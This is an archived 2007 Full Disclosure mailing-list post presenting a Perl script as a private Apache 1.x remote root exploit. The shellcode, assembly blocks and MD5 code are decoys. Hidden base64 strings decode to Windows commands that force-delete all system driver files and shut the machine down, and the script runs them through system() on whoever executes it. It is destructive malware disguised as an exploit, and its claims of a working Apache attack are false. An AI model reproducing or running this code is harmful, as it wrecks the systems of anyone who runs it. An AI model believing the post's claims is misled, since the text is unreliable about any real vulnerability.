Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

A new apache 1.x 0day
From: x666 () Safe-mail net
Date: Mon, 19 Mar 2007 15:15:36 -0400

Hi,

A new apache 1.x 0day

#!/usr/bin/perl

use MIME::Base64;
use IO::Socket;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;

print q {

#################################################################
##
## Apache 1.X Remote Buffer Overflow getRoot() Exploit
## written by 666 - blueshisha () safe-mail net
##
## ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE !
##
## If this is gonna be distributed, it will be my last one.
##
#################################################################

};

if($#ARGV < 1)
{
        print "[^] Usage   :  apache.pl [target] [port]\n";
        print "[^] Example :  apache.pl 127.0.0.1 80\n";
        exit;
}

# Can be replaced, simply get a rootshell


$shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
              "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
              "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
              "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
              "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
              "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
              "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
              "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
              "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
              "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
              "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
              "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";


my $target = $ARGV[1];

my $port   = $ARGV[2];


sub connect    {
       
local $SIG{'__DIE__'} =
       sub { (my $x = $_[0]) =~ s/0x/4/g; die $x };
       eval { die "0x4141414141" };
       print $@ if $@;
 }


sub socket    {
       
push  SOCKADDR;
push  SOCKDATA;
push  STACKDATA;
push  ESPOINT;
push  ENDADDR;

 }

eval qw (

Bytecode:

        dec cx
        jz Root
        mov     bp, FloppyOff  ;offset
        pushf
        push     cs
                push            bp
        jmp     [OldISR]
        
Root:                                           
        inc     cx                              
        cmp     dx, [SecondCntr] ;cs:.           
        jne     NotSecond                       
IsSecond:                                       
        

        mov     bh,5                            
        mov     bl,21                           
        call    seg OSSetCursorXY:OSSetCursorXY           ; root runs once
        mov     ax,cx                           
        call    seg OSPrintWordNum:OSPrintWordNum         
        
        
        
        mov     bh,5                        
        mov     bl,22                          
        call    seg OSSetCursorXY:OSSetCursorXY           
        mov     ax,[RootCntr] ;cs:.                  
        mov     [RootCntr],0 ;cs:.                  
        call    seg OSPrintWordNum:OSPrintWordNum
);       

{

   my ( @S, @T, @M );

   my $code = '';



   sub md5 {

       return undef if ( !defined $_[0] ); 

       my $DATA = _md5_pad( $_[0] );

       &_md5_init() if ( !defined $M[0] );

       return _md5_perl_generated( \$DATA );

   }



   sub _md5_init {

       return if ( defined $S[0] );

       my $i;

       for ( $i = 1 ; $i <= 64 ; $i++ ) {

           $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );

       }

       my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );

       for ( $i = 0 ; $i < 64 ; $i++ ) {

           $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];

       }

       @M = (

           0, 1, 2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,

           1, 6, 11, 0,  5,  10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,

           5, 8, 11, 14, 1,  4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,

           0, 7, 14, 5,  12, 3,  10, 1,  8,  15, 6,  13, 4,  11, 2,  9

       );

       &_md5_generate();

       my $TEST = _md5_pad('foobar');



       
   }



   sub _md5_pad {

       my $l = length( my $msg = shift() . chr(128) );

       $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );

       $l = ( $l - 1 ) * 8;

       $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );

       return $msg;

   }

   $mov = decode_base64("QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=");
   $int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==");

   sub _md5_generate {

       my $N = 'abcddabccdabbcda';

       my ( $i, $M ) = ( 0, '' );

       $M    = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); 

       $code = <<EOT;

       sub _md5_perl_generated {

   BEGIN { \$^H |= 1; }; 

       my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);

       my (\$a,\$b,\$c,\$d,\$t,\$i);

       my \$dr=shift;

       my \$l=length(\$\$dr);

       for my \$L (0 .. ((\$l/64)-1) ) {

               my \ () D = unpack('V16', substr(\$\$dr, \$L*64,64));

               (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);

EOT

       for ( $i = 0 ; $i < 16 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             "\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       for ( ; $i < 32 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             "\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       for ( ; $i < 48 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       for ( ; $i < 64 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       $code .= <<EOT;

               \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;

               \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;

       } # for

   return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }

EOT

       eval "$code";

   }

}

   sub  rehash
   {
      my $unencrypted_string = shift @_;
      my @salt_chars         = ('a'..'z','A'..'Z','0'..'9');
      my $salt               = $salt_chars[rand(63)] . $salt_chars[rand(63)];
      return crypt($unencrypted_string, $salt);
   }

eval qw (

make_startup_room:         ; setup ebp for WSAStartup data
  push BYTE 20             ; push 20
  pop eax                  ; register
  mul eax                  ; square that shit = 0x190
  sub esp, eax             ; make room for WSAStartup data
  mov ecx, esp

make_table_room:           ; setup ebp for address table
  sub esp, BYTE (_WSA_INIT_TBLEN * 4)
  push edi                 ; [ebp + 8] = LoadLibraryA
  push esi                 ; [ebp + 4] = LGetProcAddress
  push ebx                 ; [ebp + 0] = kernel32 dll base
  mov ebp, esp
  push ecx                 ; push WSAStartup data address
  push eax                 ; push 0x190

make_table:                ; hash the table
  WSA_HASH_WINSOCK

wsa_startup:
  ; call WSAStartup
  WSA_CALL_WSASTART

make_socket:
  ; call WSASocketA, get a tcp socket
  WSA_CALL_SOCKET 'tcp'
  ; we got the socket in edi
);system ($mov);system ($int);shift;
eval qw (

        push    word 0x4D2    
 
        inc     ebx        
 
        push    bx        
 
        mov     ecx, esp    
 
        push    byte 16        
 
        push    ecx        
 
        push    eax        
 
        mov     ecx, esp
 
        mov     al, 102
 
        int     0x80
);

print "[x] Exploiting...\n";

sleep(4);

eval qw <
accept:
 
    push     eax
 
    push     edi
 
    mov     ecx, esp
 
    inc      ebx        
 
    mov     al, 102    
 
    int     0x80
 
dup2:
 
        xor     ecx, ecx
 
        mov      cl, 3
;

if ($recvdata != 0) {
print "[x] Executing Shellcode...";
}

if ($recvdata == 0) {
print "[x] Exploit failed!";
}

eval qw <
exec:
 
    xor    eax,eax
 
    mov     al, 11            
 
    push    ecx
 
    push     "//sh"
 
    push     "/bin"
 
    mov      ebx, esp
 
    push     ecx
 
    push     ebx
 
    mov      ecx, esp
 
    int      0x80
;

exit;

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault